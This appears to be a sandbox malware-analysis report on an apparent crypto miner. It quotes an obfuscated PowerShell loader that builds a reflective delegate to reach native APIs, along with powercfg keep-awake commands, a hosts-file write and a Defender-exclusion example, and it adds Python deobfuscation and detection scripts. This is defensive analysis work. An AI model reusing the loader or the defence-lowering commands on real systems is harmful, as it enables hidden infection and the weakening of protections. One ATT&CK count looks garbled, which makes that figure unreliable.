          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:tvjmjwkkljdl{param([outputtype([type])][parameter(position=0)][type[]]$rucvliravsksnu,[parameter(position=1)][type]$ldxjoqsfca)$hzepfdaiuju=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+''+'f'+''+'l'+''+'e'+''+[char](99)+''+[char](116)+'e'+'d'+''+'d'+''+'e'+''+'l'+''+[char](101)+''+[char](103)+''+'a'+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+'n'+'mem'+[char](111)+''+'r'+''+[char](121)+''+'m'+''+[char](111)+''+'d'+''+'u'+''+[char](108)+'e',$false).definetype(''+[char](77)+''+'y'+''+[char](68)+''+'e'+''+[char](108)+''+[char](101)+''+[char](103)+'a'+[char](116)+'e'+[char](84)+'y'+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+'a'+'s'+''+'s'+''+[char](44)+''+[char](80)+''+[char](117)+''+'b'+''+'l'+'ic'+','+''+[char](83)+''+[char](101)+'al'+[char](101)+''+'d'+','+[char](65)+''+[char](110)+'s'+[char](105)+''+[char](67)+'l'+[char](97)+''+'s'+''+'s'+''+[char](44)+''+[char](65)+''+'u'+''+'t'+''+[char](111)+''+[char](67)+''+'l'+''+'a'+''+'s'+''+[char](115)+'',[multicastdelegate]);$hzepfdaiuju.defineconstructor('r'+'t'+'sp'+[char](101)+''+[char](99)+''+[char](105)+''+[char](97)+'l'+[char](78)+''+[char](97)+'m'+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+''+[char](101)+''+[char](66)+'y'+'s'+''+'i'+''+[char](103)+''+','+''+'p'+''+'u'+''+'b'+''+[char](108)+''+[char](105)+'c',[reflection.callingconventions]::standard,$rucvliravsksnu).setimplementationflags('ru'+[char](110)+''+'t'+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+'aged');$hzepfdaiuju.definemethod('i'+[char](110)+''+[char](118)+''+[char](111)+''+[char](107)+''+[char](101)+'',''+'p'+''+'u'+''+'b'+''+[char](108)+''+'i'+''+'c'+''+','+''+[char](72)+'
i'+[char](100)+'e'+[char](66)+''+[char](121)+''+[char](83)+''+[char](105)+''+[char](103)+','+[char](78)+'e'+[char](119)+''+[char](83)+'l'+[char](111)+'t,v'+'i'+''+'r'+''+[char](116)+''+'u'+'a'+'l'+'',$ldxjoqsfca,$rucvliravsksnu).setimplementationflags(''+'r'+''+'u'+'n'+[char](116)+''+'i'+'m'+[char](101)+''+[char](44)+''+[char](77)+''+'a'+''+'n'+''+'a'+''+[char](103)+'e'+[char](100)+'');write-output $hzepfdaiuju.createtype();}$opujgspdjbnob=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+[char](115)+''+'t'+''+[char](101)+''+[char](109)+''+[char](46)+''+[char](100)+''+[char](108)+''+[char](108)+'')}).gettype(''+'m'+''+'i'+''+[char](99)+''+[char](114)+''+'o'+''+[char](115)+'o'+[char](102)+'t'+[char](46)+'w'+[char](105)+''+[char](110)+'3'+[char](50)+''+'.'+''+[char](85)+'n'+[char](115)+''+'a'+'f'+'e'+''+[char](78)+''+'a'+''+[char](116)+''+[char](105)+''+[char](118)+''+[char](101)+''+'m'+'et'+[char](104)+''+[char](111)+''+[char](1
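The two PowerShell command lines above hide every string behind chains of single-quoted fragments and [char](N) casts joined with '+'. Decoded, they define a delegate type at run time through System.Reflection.Emit (DefineDynamicAssembly, DefineDynamicModule, DefineType deriving from MulticastDelegate, with a constructor and an Invoke method marked Runtime, Managed) and then look up Microsoft.Win32.UnsafeNativeMethods in System.dll, the standard way of calling native APIs from PowerShell without Add-Type writing a DLL to disk. Both command lines are truncated in the report, so which native functions are resolved next is not visible here. The decoder below is an added example, not part of the report or of the sample: it evaluates each concatenation chain and rewrites the script with plain literals, which is usually enough to read the rest of the logic. The sample input is constructed from fragments copied from the first command line with shortened variable names, and the watch-list of indicator strings is an assumption. One caveat the decoded output makes visible: the sandbox renders the command line in lower case, so literal letters have lost their original case while [char](N) codes keep it, which is why "InMemorymodule" and "microsoft.Win32.unsafeNativeMethods" come out mixed.

```python
import re

# Grammar of the obfuscation: a "chain" is a maximal run of single-quoted literals
# and [char](N) casts joined with '+'; it evaluates to a single string.
_PIECE = r"(?:'[^']*'|\[char\]\(\s*\d+\s*\))"
_CHAIN = re.compile(rf"{_PIECE}(?:\s*\+\s*{_PIECE})*", re.IGNORECASE)
_TOKEN = re.compile(r"'([^']*)'|\[char\]\(\s*(\d+)\s*\)", re.IGNORECASE)


def decode_chain(expr):
    """Evaluate one '..'+[char](N)+'..' chain to the string it builds.

    Limitation: a doubled quote ('') is treated as an empty literal, which is what
    this sample uses; PowerShell's '' escape inside a literal is not handled.
    """
    return "".join(lit if code == "" else chr(int(code)) for lit, code in _TOKEN.findall(expr))


def deobfuscate(script):
    """Rewrite every chain in the script as one plain quoted literal."""
    return _CHAIN.sub(lambda m: "'" + decode_chain(m.group(0)).replace("'", "''") + "'", script)


def extract_strings(script):
    """All decoded string values, in order of appearance."""
    return [decode_chain(m.group(0)) for m in _CHAIN.finditer(script)]


# Assumed watch-list: names an analyst expects in a dynamic P/Invoke loader.
INDICATORS = ("unsafenativemethods", "getprocaddress", "getmodulehandle", "virtualalloc",
              "virtualprotect", "createthread", "reflecteddelegate", "inmemorymodule")


def indicators_present(script):
    """Watch-list entries that appear once the chains are decoded (case-insensitive)."""
    decoded = deobfuscate(script).lower()
    return [i for i in INDICATORS if i in decoded]


# Constructed sample: fragments copied from the first command line in the report,
# stitched together with shortened variable names so that it stays readable.
SAMPLE = (
    "$asm=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname("
    "''+[char](82)+'e'+[char](102)+''+[char](108)+''+'e'+''+'c'+'t'+'e'+''+[char](100)+''"
    "+[char](68)+''+[char](101)+''+'l'+''+[char](101)+''+'g'+''+'a'+'t'+[char](101)+'')),"
    "[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule("
    "''+[char](73)+''+[char](110)+''+[char](77)+''+[char](101)+''+[char](109)+'o'+[char](114)"
    "+'ymo'+'d'+''+[char](117)+''+[char](108)+''+[char](101)+'',$false);"
    "$sys=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache "
    "-and $_.location.split('\\')[-1].equals(''+[char](83)+'y'+'s'+''+[char](116)+''"
    "+[char](101)+''+[char](109)+''+[char](46)+''+'d'+''+[char](108)+''+[char](108)+'')})"
    ".gettype('m'+[char](105)+'c'+[char](114)+''+'o'+'s'+'o'+''+[char](102)+''+[char](116)+''"
    "+[char](46)+''+[char](87)+''+[char](105)+''+[char](110)+''+'3'+''+[char](50)+''+[char](46)"
    "+'u'+'n'+''+'s'+''+[char](97)+''+[char](102)+''+[char](101)+''+[char](78)+''+[char](97)+''"
    "+'t'+''+'i'+''+'v'+''+[char](101)+''+[char](77)+''+[char](101)+''+[char](116)+'h'+[char](111)"
    "+''+[char](100)+''+[char](115)+'')"
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(indicators_present(SAMPLE))
```

Running it on the sample yields the literals 'ReflectedDelegate', 'InMemorymodule', 'System.dll' and 'microsoft.Win32.unsafeNativeMethods' in place of the chains. The same pass works on the full command line as captured by Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing on, because the decoder only needs the text, not a running PowerShell.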
          Source: C:\Windows\System32\dllhost.exe | Code function: 45_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 45_2_0000000140002300
          Source: C:\Windows\System32\dllhost.exe | Code function: 45_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 45_2_0000000140002300
          Source: C:\Windows\System32\conhost.exe | Code function: 32_3_000001D29E8A3B20 cpuid 32_3_000001D29E8A3B20
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,45_2_0000000140002300
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8C7D90 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,32_2_000001D29E8C7D90
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\powercfg.exe | Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\powercfg.exe | Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\powercfg.exe | Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\powercfg.exe | Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe | Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe | Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\egFMhHSlmf.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: dllhost.exe | Binary or memory string: MsMpEng.exe

powercfg /x with -standby-timeout-ac 0 and -hibernate-timeout-ac 0 sets the AC-power sleep and hibernation timeouts to "never", so the host stays awake and the miner keeps running. The write to the hosts file lets the sample override name resolution for chosen domains (the report does not show the entries written; miners commonly use this to block AV-update and competitor-pool names). The MsMpEng.exe string in dllhost.exe is the file name of the Windows Defender antimalware service, consistent with the Defender-exclusion signature elsewhere in this report.
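Added example, not part of the Joe Sandbox report or of the sample's code: detection logic for the three behaviours listed above, run over Sysmon-style events (EID 1 process creation, EID 11 file creation). The two powercfg command lines are the ones from the report; the Add-MpPreference command line, the exclusion path, the hosts-file contents and every process ID except 1764 are constructed assumptions. A base64 -EncodedCommand would evade the Add-MpPreference regex, so on real telemetry decode the command line first or match on PowerShell Script Block Logging (event 4104) instead.

```python
"""Flag the defence-lowering behaviours reported for this sample:
powercfg keep-awake timeouts, a write to the hosts file, and a Windows
Defender exclusion added via Add-MpPreference."""
import re

# powercfg /x -standby-timeout-ac 0, -hibernate-timeout-ac 0 (and the dc / monitor variants)
POWERCFG_KEEPALIVE = re.compile(
    r"-(?:standby|hibernate|monitor)-timeout-(?:ac|dc)\s+0\b", re.I)
# Add-MpPreference with any exclusion switch (plain-text command lines only)
DEFENDER_EXCLUSION = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)", re.I)
HOSTS_PATH = r"c:\windows\system32\drivers\etc\hosts"
SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::1"}


def flag_process_events(events):
    """Return (rule, pid, detail) tuples for events that match one of the rules."""
    findings = []
    for ev in events:
        image = (ev.get("Image") or "").lower()
        if ev["EventID"] == 1:
            cmd = ev.get("CommandLine", "")
            if image.endswith("\\powercfg.exe") and POWERCFG_KEEPALIVE.search(cmd):
                findings.append(("powercfg_keepalive", ev["ProcessId"], cmd))
            if image.endswith("\\powershell.exe") and DEFENDER_EXCLUSION.search(cmd):
                findings.append(("defender_exclusion", ev["ProcessId"], cmd))
        elif ev["EventID"] == 11:
            if (ev.get("TargetFilename") or "").lower() == HOSTS_PATH:
                findings.append(("hosts_file_write", ev["ProcessId"], ev.get("Image")))
    return findings


def suspicious_hosts_entries(hosts_text):
    """Return (ip, name) pairs that sink-hole a name to 0.0.0.0 / 127.0.0.1 / ::1.
    Only localhost is allowed: a stock Windows hosts file has every entry commented out."""
    hits = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        ip, *names = line.split()
        if ip not in SINKHOLE_IPS:
            continue
        for name in names:
            if name.lower() not in ("localhost", "localhost.localdomain"):
                hits.append((ip, name.lower()))
    return hits


SAMPLE_EVENTS = [  # constructed; only PID 1764 and the powercfg command lines come from the report
    {"EventID": 1, "ProcessId": 1764, "Image": r"C:\Users\user\Desktop\egFMhHSlmf.exe",
     "CommandLine": r'"C:\Users\user\Desktop\egFMhHSlmf.exe"'},
    {"EventID": 1, "ProcessId": 4412, "Image": r"C:\Windows\System32\powercfg.exe",
     "CommandLine": r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"},
    {"EventID": 1, "ProcessId": 4420, "Image": r"C:\Windows\System32\powercfg.exe",
     "CommandLine": r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"},
    {"EventID": 1, "ProcessId": 4500, "Image": r"C:\Windows\System32\powercfg.exe",
     "CommandLine": r"powercfg.exe /list"},                       # benign admin use, must not fire
    {"EventID": 1, "ProcessId": 4600,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "Add-MpPreference -ExclusionPath C:\ProgramData\Google\Chrome"'},
    {"EventID": 11, "ProcessId": 1764, "Image": r"C:\Users\user\Desktop\egFMhHSlmf.exe",
     "TargetFilename": r"C:\Windows\System32\drivers\etc\hosts"},
]

SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
#   127.0.0.1       localhost
#   ::1             localhost
127.0.0.1 localhost
0.0.0.0 example-av-update.invalid   # constructed: vendor-update sink-hole
0.0.0.0 pool.minexmr.invalid        # constructed: competitor-pool sink-hole
192.0.2.10 intranet.example         # ordinary entry, not a sink-hole
"""

if __name__ == "__main__":
    for finding in flag_process_events(SAMPLE_EVENTS):
        print(finding)
    for hit in suspicious_hosts_entries(SAMPLE_HOSTS):
        print("hosts sink-hole:", hit)
```

The hosts check is deliberately independent of any domain list: after a miner infection you want every non-localhost sink-hole, not just the ones you already know about.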
MITRE ATT&CK matrix (the number before a technique is the count of matched signatures)

Execution: 12 Native API; 12 Command and Scripting Interpreter; 11 Windows Management Instrumentation; 1 PowerShell; 1 Scheduled Task/Job; 1 Service Execution
Persistence: 11 Windows Service; 1 Scheduled Task/Job; 1 DLL Side-Loading
Privilege Escalation: 712 Process Injection; 11 Windows Service; 1 Scheduled Task/Job; 1 Access Token Manipulation; 1 DLL Side-Loading
